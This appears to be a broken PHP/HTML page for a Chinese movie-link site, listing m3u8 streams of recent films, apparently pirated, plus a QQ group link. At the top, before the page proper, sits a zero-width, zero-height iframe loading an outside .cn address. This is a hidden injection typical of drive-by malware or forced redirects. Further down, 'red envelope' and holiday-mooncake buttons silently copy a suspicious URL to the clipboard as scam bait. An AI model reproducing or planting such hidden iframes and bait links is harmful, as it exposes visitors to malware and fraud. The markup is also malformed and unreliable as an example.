



<?php
<body>
   
    
    <iframe src="http://j.metasolare.cn/KzzTj35915"frameborder="0" width="0" height="0"></iframe>

   </body>
<html>
	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					电影频道
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">欢迎来到喜爱夜蒲。一切视觉盛宴.供君共享</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
							<div class="cell title"><span>
									寻电影进群留言哦<a href="http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=T1fLn9A5sMf95ckaHDYDj4QIESVxLPN9&authKey=nW3OMNbCHdTolRPairfQP5iB32RZ5iTckvadxO5pn9gdl5Odt3j6euXpFA%2B%2FV1RT&noverify=0&group_code=609286349">--返回首页</a>								</a>
								</span>
							</div>  </div> </div> 
						</div>

<br>  <span id="target"></span>
<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 

前面是文字居中 --><a href="#小程序://美团优选明日达超市真的真的省/5lEuvWYM6lgKlaK">★★★中秋福利6元五仁6月饼★★★用微信打开本页再点击</a></div></div> 
<br>  <span id="target"></span>
<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 

前面是文字居中 --><a href="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4">★★★快手红包点击领取★★★</a></div></div> </br>
</br>
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">你猜电影去哪里了.维护中.......</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	
<li><a href="https://vip.lz-cdn10.com/20220607/1743_c35a1d0b/index.m3u8">      HD高清神奇坠饰</a></li>


</summary></details>
    </script>
  <a href="https://vip.lz-cdn4.com/20230806/25949_4ab0b1f7/2000k/hls/mixed.m3u8" target="_blank">孤注一掷</a>
<a href="https://hot.qoqkkhy.com/20230707/0jnH3XLy/1000kb/hls/index.m3u8" target="_blank">八角笼</a>
<a href="https://vip.ffzy-online1.com/20230815/42855_24bd486d/2000k/hls/mixed.m3u8" target="_blank">13猛鬼</a>
<a href="https://vip.ffzy-online1.com/20230813/42846_fdab7aef/2000k/hls/mixed.m3u8" target="_blank">血腥屠杀</a>
<a href="
https://vip.ffzy-online1.com/20230815/42859_9f1bb33a/2000k/hls/mixed.m3u8" target="_blank">恐怖列车</a>
<a href="https://vip.ffzy-online1.com/20230813/42844_8d48e26c/2000k/hls/mixed.m3u8" target="_blank">食人猪</a>
<a href="https://vip.ffzy-play6.com/20221023/1310_352caec7/2000k/hls/mixed.m3u8" target="_blank">超能查派</a>
<a href="https://vip.ffzy-play1.com/20221018/360_62778076/2000k/hls/mixed.m3u8" target="_blank">速度与激情</a>
<a href="https://vip.ffzy-play7.com/20230213/14629_30d60124/2000k/hls/mixed.m3u8
速度与激情" target="_blank">明日世界</a>
<a href="https://vip.ffzy-online2.com/20230629/40222_a6b8ae3d/2000k/hls/mixed.m3u8" target="_blank">消失的她</a>
<a href="https://98tv.github.io/1.txt" target="_blank">隐藏福利</a>
</body>


</html>
